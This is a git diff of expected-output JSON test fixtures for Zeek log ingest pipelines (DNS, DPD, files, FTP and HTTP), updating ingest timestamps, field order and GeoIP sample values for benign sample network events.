"{\"ts\":1617105592.9742,\"uid\":\"CG1jsmeHcBCGnWXmk\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44310,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":58458,\"query\":\"login.microsoftonline.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"a.privatelink.msidentity.com\",\"prda.aadg.msidentity.com\",\"www.tm.a.prd.aadg.trafficmanager.net\",\"89.160.20.156\",\"40.126.31.143\",\"89.160.20.156\",\"40.126.31.1\",\"89.160.20.156\",\"40.126.31.135\",\"40.126.31.6\",\"89.160.20.156\"],\"TTLs\":[299.0,214.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -615,9 +607,27 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "community_id": "1:6FS8lMU9Y2cS38F7kmqpZmgcpbs=", + "transport": "udp" } }, { + "@timestamp": "2021-03-30T11:59:53.106Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "169.254.169.254" + ] + }, "destination": { "port": 53, "address": "169.254.169.254", 
@@ -683,26 +693,8 @@ "address": "10.156.0.2", "ip": "10.156.0.2" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "dns", - "community_id": "1:o8PIGtc58C2kli9WTnYzRHbKTwM=", - "transport": "udp" - }, - "@timestamp": "2021-03-30T11:59:53.106Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "169.254.169.254" - ] - }, "event": { - "ingested": "2021-12-09T13:50:59.483513Z", + "ingested": "2021-12-14T14:59:10.859216210Z", "original": "{\"ts\":1617105593.106256,\"uid\":\"ChP0cl4j5mbXSZ9TGf\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":36364,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":8791,\"query\":\"manage.office.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"manage.office.com.trafficmanager.net\",\"o365adtapiproddeu001.cloudapp.net\",\"89.160.20.156\"],\"TTLs\":[12.0,17.0,7.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -716,6 +708,14 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "dns", + "community_id": "1:o8PIGtc58C2kli9WTnYzRHbKTwM=", + "transport": "udp" } }, { @@ -791,7 +791,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:50:59.483518400Z", + "ingested": "2021-12-14T14:59:10.859216590Z", "original": "{\"ts\":1567095830.734329,\"uid\":\"CdiVAw7jJw6gsX5H\",\"id.orig_h\":\"192.168.86.237\",\"id.orig_p\":5353,\"id.resp_h\":\"224.0.0.251\",\"id.resp_p\":5353,\"proto\":\"udp\",\"trans_id\":0,\"query\":\"_googlecast._tcp.local\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":true,\"TC\":false,\"RD\":false,\"RA\":false,\"Z\":0,\"answers\":[\"bravia-4k-gb-5c89f865c9d569ab338815b35e3acc56._googlecast._tcp.local\"],\"TTLs\":[120.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
diff --git a/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json b/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json index 7471188fd29..9d1a920148f 100644 --- a/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json +++ b/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json @@ -29,7 +29,7 @@ "ip": "192.168.10.31" }, "event": { - "ingested": "2021-12-09T13:51:00.428784900Z", + "ingested": "2021-12-14T14:59:11.927513731Z", "original": "{\"ts\":1507567500.423033,\"uid\":\"CRrT7S1ccw9H6hzCR\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49285,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":445,\"proto\":\"tcp\",\"analyzer\":\"DCE_RPC\",\"failure_reason\":\"Binpac exception: binpac exception: \\u0026enforce violation : DCE_RPC_Header:rpc_vers\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -94,7 +94,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:00.428792700Z", + "ingested": "2021-12-14T14:59:11.927516102Z", "original": "{\"ts\":1507567500.423033,\"uid\":\"CRrT7S1ccw9H6hzCR\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49285,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":445,\"proto\":\"tcp\",\"analyzer\":\"DCE_RPC\",\"failure_reason\":\"Binpac exception: binpac exception: \\u0026enforce violation : DCE_RPC_Header:rpc_vers\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json b/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json index f431a34ebaa..2bcdbe5a824 100644 --- a/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json +++ b/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json 
@@ -57,7 +57,7 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-12-09T13:51:00.753332400Z", + "ingested": "2021-12-14T14:59:12.263556496Z", "original": "{\"ts\":1547688796.636812,\"fuid\":\"FMkioa222mEuM2RuQ9\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C8I0zn3r9EPbfLgta6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":947,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"79e4a9840d7d3a96d7c04fe2434c892e\",\"sha1\":\"a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -130,7 +130,7 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-12-09T13:51:00.753340900Z", + "ingested": "2021-12-14T14:59:12.263559362Z", "original": "{\"ts\":1547688801.566262,\"fuid\":\"FShtIS1gydeSFf8M63\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":2089,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"b9742f12eb97eff531d94f7800c6706c\",\"sha1\":\"b88d13fe319d342e7a808ce3a0a1158111fc3c2a\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -203,7 +203,7 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-12-09T13:51:00.753346700Z", + "ingested": "2021-12-14T14:59:12.263559844Z", "original": "{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -280,7 +280,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:51:00.753352300Z", + "ingested": "2021-12-14T14:59:12.263560228Z", "original": "{\"ts\":1617069763.671838,\"fuid\":\"Fe722V1qt2DSlqCiOa\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"ClG5ErV7bkgKgOaV\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -357,7 +357,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:51:00.753359800Z", + "ingested": "2021-12-14T14:59:12.263560605Z", "original": "{\"ts\":1617069773.678327,\"fuid\":\"FYszs61e8hIUWMWgL5\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"CaB3fq3yLrKCbYLqr4\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -434,7 +434,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:51:00.753365500Z", + "ingested": "2021-12-14T14:59:12.263560984Z", "original": "{\"ts\":1617069783.678588,\"fuid\":\"FdGWZq2wRIvCfjvdI5\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"C0vhl91PPOI7LbrPZ8\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -507,7 +507,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:51:00.753370900Z", + "ingested": "2021-12-14T14:59:12.263561363Z", "original": "{\"ts\":1617069792.519193,\"fuid\":\"FSMkdM3YUSoEVpLZN4\",\"tx_hosts\":[\"169.254.169.254\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"CgbPEj2jf5Ca7Lw0x2\"],\"source\":\"HTTP\",\"depth\":0,\"analyzers\":[\"SHA1\",\"MD5\"],\"mime_type\":\"text/html\",\"duration\":0.00005316734313964844,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1609,\"total_bytes\":1609,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"1ab1d3a926a99ccfc25acccc5b4289b4\",\"sha1\":\"1895628784b47ad8da112c699a1b21f5b49c2b80\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -584,7 +584,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-12-09T13:51:00.753376300Z", + "ingested": "2021-12-14T14:59:12.263561761Z", "original": "{\"ts\":1617069793.669729,\"fuid\":\"F1msmE2xRFsdvL2iI\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"C0vua63rzjtLaiefyj\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -668,7 +668,7 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-12-09T13:51:00.753381700Z", + "ingested": "2021-12-14T14:59:12.263562136Z", "original": "{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json b/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json index 80ed77ec353..f9a86998070 100644 --- a/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json +++ b/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json @@ -1,6 +1,19 @@ { "expected": [ { + "@timestamp": "2007-08-17T19:31:44.955Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "ftp" + ], + "ip": [ + "192.168.1.182", + "192.168.1.231" + ] + }, "destination": { "port": 21, "address": "192.168.1.231", 
@@ -29,29 +42,8 @@ "address": "192.168.1.182", "ip": "192.168.1.182" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "ftp", - "community_id": "1:Szmpl33Czo3dQvU2V4/SrHfmBC0=", - "transport": "tcp" - }, - "@timestamp": "2007-08-17T19:31:44.955Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "ftp" - ], - "ip": [ - "192.168.1.182", - "192.168.1.231" - ] - }, "event": { - "ingested": "2021-12-09T13:51:01.440342Z", + "ingested": "2021-12-14T14:59:12.935449967Z", "original": "{\"ts\":1187379104.955342,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"EPSV\",\"reply_code\":229,\"reply_msg\":\"Entering Extended Passive Mode (|||37100|)\",\"data_channel.passive\":true,\"data_channel.orig_h\":\"192.168.1.182\",\"data_channel.resp_h\":\"192.168.1.231\",\"data_channel.resp_p\":37100}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -68,6 +60,14 @@ }, "user": { "name": "ftp" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "ftp", + "community_id": "1:Szmpl33Czo3dQvU2V4/SrHfmBC0=", + "transport": "tcp" } }, { @@ -119,7 +119,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:51:01.440350900Z", + "ingested": "2021-12-14T14:59:12.935452973Z", "original": "{\"ts\":1187379105.01948,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"RETR\",\"arg\":\"ftp://192.168.1.231/resume.doc\",\"file_size\":39424,\"reply_code\":226,\"reply_msg\":\"Transfer complete.\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -139,6 +139,19 @@ } }, { + "@timestamp": "2007-08-17T19:31:57.579Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "ftp" + ], + "ip": [ + "192.168.1.182", + "192.168.1.231" + ] + }, "destination": { "port": 21, "address": "192.168.1.231", @@ -162,29 +175,8 @@ "address": "192.168.1.182", "ip": "192.168.1.182" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "ftp", - "community_id": "1:Szmpl33Czo3dQvU2V4/SrHfmBC0=", - "transport": "tcp" - }, - "@timestamp": "2007-08-17T19:31:57.579Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "ftp" - ], - "ip": [ - "192.168.1.182", - "192.168.1.231" - ] - }, "event": { - "ingested": "2021-12-09T13:51:01.440355400Z", + "ingested": "2021-12-14T14:59:12.935453444Z", "original": "{\"ts\":1187379117.579203,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"STOR\",\"arg\":\"ftp://192.168.1.231/uploads/README\",\"reply_code\":226,\"reply_msg\":\"Transfer complete.\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -201,6 +193,14 @@ }, "user": { "name": "ftp" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "ftp", + "community_id": "1:Szmpl33Czo3dQvU2V4/SrHfmBC0=", + "transport": "tcp" } }, { @@ -257,7 +257,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:01.440358800Z", + "ingested": "2021-12-14T14:59:12.935453827Z", "original": "{\"ts\":1187379117.579203,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"STOR\",\"arg\":\"ftp://192.168.1.231/uploads/README\",\"reply_code\":226,\"reply_msg\":\"Transfer complete.\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
diff --git a/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json b/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json index 9a21b7521e5..f567a49723a 100644 --- a/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json +++ b/packages/zeek/data_stream/http/_dev/test/pipeline/test-http.log-expected.json @@ -4,14 +4,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -85,7 +85,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:01.993412400Z", + "ingested": "2021-12-14T14:59:13.505264792Z", "original": "{\"ts\":1547687130.172944,\"uid\":\"CCNp8v1SNzY7v9d1Ih\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":62995,\"id.resp_h\":\"89.160.20.156\",\"username\":\"user\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"ocsp.apple.com\",\"uri\":\"/ocsp04-aaica02/ME4wTKADAgEAMEUwQzBBMAkGBSsOAwIaBQAEFNqvF+Za6oA4ceFRLsAWwEInjUhJBBQx6napI3Sl39T97qDBpp7GEQ4R7AIIUP1IOZZ86ns=\",\"version\":\"1.1\",\"user_agent\":\"com.apple.trustd/2.0\",\"request_body_len\":0,\"response_body_len\":3735,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F5zuip1tSwASjNAHy7\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -117,14 +117,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -194,7 +194,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:01.993421500Z", + "ingested": "2021-12-14T14:59:13.505267594Z", "original": "{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -221,17 +221,27 @@ } }, { + "@timestamp": "2021-03-30T05:15:54.277Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -258,28 +268,6 @@ }, "session_id": "CdqHhA1AsxBIjmVZ9" }, - "source": { - "port": 57896, - "address": "10.156.0.2", - "ip": "10.156.0.2" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Va3F0U8tWSumaLfdIthiogJqVoM=", - "transport": "tcp" - }, - "@timestamp": "2021-03-30T05:15:54.277Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "89.160.20.156" - ] - }, "http": { "request": { "body": { @@ -294,8 +282,13 @@ "status_code": 200 } }, + "source": { + "port": 57896, + "address": "10.156.0.2", + "ip": "10.156.0.2" + }, "event": { - "ingested": "2021-12-09T13:51:01.993427600Z", + "ingested": "2021-12-14T14:59:13.505268156Z", "original": "{\"ts\":1617081354.277591,\"uid\":\"CdqHhA1AsxBIjmVZ9\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":57896,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FM01o54RU9pez8AJba\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -310,20 +303,37 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Va3F0U8tWSumaLfdIthiogJqVoM=", + "transport": "tcp" } }, { + "@timestamp": "2021-03-30T05:15:55.599Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -350,28 +360,6 @@ }, "session_id": "CxhRTwkHNRsHxBw34" }, - "source": { - "port": 55378, - "address": "10.156.0.2", - "ip": "10.156.0.2" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:WGP7lVikdNxSruwUqKr9UJsM6cg=", - "transport": "tcp" - }, - "@timestamp": "2021-03-30T05:15:55.599Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "89.160.20.156" - ] - }, "http": { "request": { "body": { @@ -386,8 +374,13 @@ "status_code": 301 } }, + "source": { + "port": 55378, + "address": "10.156.0.2", + "ip": "10.156.0.2" + }, "event": { - "ingested": "2021-12-09T13:51:01.993433500Z", + "ingested": "2021-12-14T14:59:13.505268533Z", "original": "{\"ts\":1617081355.599548,\"uid\":\"CxhRTwkHNRsHxBw34\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":55378,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.1\",\"request_body_len\":0,\"response_body_len\":191,\"status_code\":301,\"status_msg\":\"Moved Permanently\",\"tags\":[],\"resp_fuids\":[\"FVGTq31RBgKGE02hx7\"],\"resp_mime_types\":[\"text/html\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -402,20 +395,37 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:WGP7lVikdNxSruwUqKr9UJsM6cg=", + "transport": "tcp" } }, { + "@timestamp": "2021-03-30T05:16:00.171Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -442,28 +452,6 @@ }, "session_id": "CrI5Xg30caNXnNvEse" }, - "source": { - "port": 41960, - "address": "10.156.0.2", - "ip": "10.156.0.2" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:/5C96eJFQOtyIA58kKSJqNHqFag=", - "transport": "tcp" - }, - "@timestamp": "2021-03-30T05:16:00.171Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "89.160.20.156" - ] - }, "http": { "request": { "body": { @@ -478,8 +466,13 @@ "status_code": 200 } }, + "source": { + "port": 41960, + "address": "10.156.0.2", + "ip": "10.156.0.2" + }, "event": { - "ingested": "2021-12-09T13:51:01.993439400Z", + "ingested": "2021-12-14T14:59:13.505268935Z", "original": "{\"ts\":1617081360.171904,\"uid\":\"CrI5Xg30caNXnNvEse\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":41960,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F8vozz46VoxeAmqLv3\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -494,20 +487,37 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:/5C96eJFQOtyIA58kKSJqNHqFag=", + "transport": "tcp" } }, { + "@timestamp": "2021-03-30T05:16:04.250Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
